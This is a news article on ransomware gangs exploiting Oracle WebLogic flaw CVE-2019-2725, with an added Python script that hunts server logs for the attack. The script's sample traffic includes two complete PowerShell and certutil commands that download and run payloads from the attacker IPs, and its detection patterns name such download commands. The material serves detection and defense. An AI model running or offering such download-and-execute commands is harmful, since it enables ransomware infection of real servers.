Attackers are actively exploiting a critical zero-day vulnerability in the widely used Oracle WebLogic Server to install ransomware, with no clicking or other interaction required from end users, researchers from Cisco Talos said on Tuesday.
The vulnerability and a working exploit for it first became public two weeks ago through the Chinese National Vulnerability Database, according to researchers at the SANS ISC security training organization, who warned at the time that the flaw was under active attack. The vulnerability is trivial to exploit and lets an attacker run code of their choice on the affected server. Because of their computing power, bandwidth, and use in otherwise well-secured cloud environments, those servers are considered high-value targets. The disclosure prompted Oracle to release an emergency patch on Friday.
On Tuesday, researchers from Cisco Talos said the vulnerability, indexed as CVE-2019-2725, has been under active exploitation since at least April 21. Since last Thursday, the day before Oracle patched the zero-day, attackers have been using exploits to install a new piece of ransomware called "Sodinokibi" on compromised servers. In addition to encrypting data on the infected computer, the malware attempts to delete shadow copy backups so that targets cannot simply restore the lost data. Curiously, about eight hours after the initial infection, the attackers exploit the same vulnerability again to install a second piece of ransomware, known as GandCrab.
No interaction required
"Historically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device," Talos researchers Pierre Cadieux, Colin Grady, Jaeson Schultz, and Matt Valites wrote in a post on Tuesday. "In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79."
The vulnerability is easy to exploit because all an attacker needs is HTTP access to a vulnerable WebLogic server; no credentials and no action by an end user are involved. Its Common Vulnerability Scoring System severity rating is 9.8 out of a possible 10. Attackers send vulnerable servers an HTTP POST request containing a PowerShell command that downloads and executes a malicious file named "radm.exe." Besides PowerShell, the criminals also exploit CVE-2019-2725 to invoke the certutil command-line utility, which can likewise fetch a file from a remote URL. Other files that get downloaded and executed include office.exe and untitled.exe.
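The delivery chain described above (an HTTP POST whose body carries a PowerShell or certutil download-and-execute command, fetching a payload from one of the two attacker-controlled IP addresses) is something a defender can hunt for in web-server or proxy logs. The script below is an added illustration written for this page, not code from Cisco Talos or from the article. The IP addresses and filenames come from the text; the regular expressions for the download commands, the log record layout, and the sample requests are my own constructions. The article does not name the vulnerable URL path, so the example deliberately keys on the method and body rather than on a path.

```python
"""Hunt for WebLogic POST bodies that carry a PowerShell or certutil
download cradle, and for URLs pointing at the attacker infrastructure
named in the Talos write-up. Added example; not the article's own code."""
import re
from urllib.parse import urlparse

# Indicators quoted in the article: attacker-controlled download hosts and
# the filenames the PowerShell/certutil commands fetch and run.
ATTACKER_IPS = {"188.166.74.218", "45.55.211.79"}
DROPPED_FILES = {"radm.exe", "office.exe", "untitled.exe"}

# Download-cradle patterns. These regexes are my assumptions about what a
# malicious POST body looks like; the article quotes no request bodies.
CRADLES = {
    "powershell_download": re.compile(
        r"powershell(?:\.exe)?\b.*?"
        r"(?:DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer)",
        re.IGNORECASE | re.DOTALL),
    "certutil_download": re.compile(
        r"certutil(?:\.exe)?\s+(?:-|/)urlcache\b", re.IGNORECASE),
}
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def scan_request(method, body):
    """Return the indicator names triggered by one HTTP request.

    Only POST bodies are inspected, because that is the vector the text
    describes. Indicators are appended in a fixed order: cradle patterns
    first, then per-URL host and filename matches.
    """
    hits = []
    if method.upper() != "POST" or not body:
        return hits
    for name, pattern in CRADLES.items():
        if pattern.search(body):
            hits.append(name)
    for url in URL_RE.findall(body):
        parsed = urlparse(url)
        if parsed.hostname in ATTACKER_IPS:
            hits.append("attacker_ip:" + parsed.hostname)
        filename = parsed.path.rsplit("/", 1)[-1].lower()
        if filename in DROPPED_FILES:
            hits.append("dropped_file:" + filename)
    return hits


def scan_log(records):
    """Scan (src_ip, method, body) tuples; return one alert per matching record."""
    alerts = []
    for index, (src_ip, method, body) in enumerate(records):
        hits = scan_request(method, body)
        if hits:
            alerts.append({"record": index, "src": src_ip, "indicators": hits})
    return alerts


# Constructed sample traffic (not captured data): a benign SOAP POST, a
# PowerShell cradle, a certutil cradle, and a GET that must not match.
SAMPLE = [
    ("10.0.0.5", "POST",
     "<soapenv:Envelope><order>42</order></soapenv:Envelope>"),
    ("203.0.113.9", "POST",
     "cmd /c powershell -nop -w hidden (New-Object Net.WebClient)"
     ".DownloadFile('http://188.166.74.218/radm.exe','C:\\Windows\\Temp\\radm.exe');"
     "Start-Process C:\\Windows\\Temp\\radm.exe"),
    ("203.0.113.9", "POST",
     "cmd /c certutil -urlcache -split -f http://45.55.211.79/office.exe "
     "C:\\Windows\\Temp\\office.exe & C:\\Windows\\Temp\\office.exe"),
    ("198.51.100.7", "GET", ""),
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE):
        print(alert)
```

Matching on the two IP addresses alone is brittle, since infrastructure changes between campaigns; the cradle patterns are the more durable signal, and in production they should be combined with the request path of the vulnerable WebLogic component once that is known for your deployment.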
The ransom note, shown in part above and in full below, demands that the target pay $2,500 in Bitcoin within two days to receive the decryption key that unlocks the encrypted data. After that deadline, the ransom doubles to $5,000. The attackers provide instructions explaining how cryptocurrency novices can create a Bitcoin wallet and obtain the digital currency, and they recommend using Blockchain.info.
The attacks exploit a high-severity zero-day in software that is widely used in cloud environments, and that combination of factors makes it likely the campaign will continue. Organizations that use WebLogic should make installing Friday's patch a top priority. Because exploitation began at least five days before the patch was available, servers that are patched now should also be checked for the indicators described above, including connections to the two listed IP addresses and the presence of the radm.exe, office.exe, and untitled.exe files.